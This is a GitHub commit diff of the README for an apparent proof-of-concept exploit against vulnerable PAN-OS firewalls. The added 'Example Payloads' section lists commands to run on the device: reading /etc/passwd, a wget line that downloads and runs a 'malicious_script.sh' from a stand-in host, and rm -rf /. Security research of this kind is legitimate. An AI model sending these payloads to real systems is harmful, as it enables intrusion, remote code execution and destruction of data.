| skipped 23 lines |
| 24 | 24 | | python3 PoC.py |
| 25 | 25 | | |
| 26 | 26 | | Follow the prompts to enter the IP address of the vulnerable PAN-OS firewall and the payload to execute. |
| 27 | | - | Optionally, enter 'q' to quit the script. |
| | 27 | + | |
| | 28 | + | ## Example Payloads |
| | 29 | + | |
| | 30 | + | 1. List Directory Contents: |
| | 31 | + | ```bash |
| | 32 | + | ls -la |
| | 33 | + | |
| | 34 | + | 2. Print the contents of a specific file: |
| | 35 | + | ```bash |
| | 36 | + | cat /etc/passwd |
| | 37 | + | |
| | 38 | + | 3. Print the username of the current user who is logged in to the system: |
| | 39 | + | ```bash |
| | 40 | + | whoami |
| | 41 | + | |
| | 42 | + | 4. Download a file from the internet (requires wget or curl installed): |
| | 43 | + | ```bash |
| | 44 | + | wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh |
| | 45 | + | |
| | 46 | + | 5. Be very careful with this one: |
| | 47 | + | ```bash |
| | 48 | + | rm -rf / |
| 28 | 49 | | |
| 29 | 50 | | ## References |
| 30 | 51 | | |
| skipped 5 lines |
DrewskyDev
committed
with
GitHub
1 month ago
1 parent e6acbca5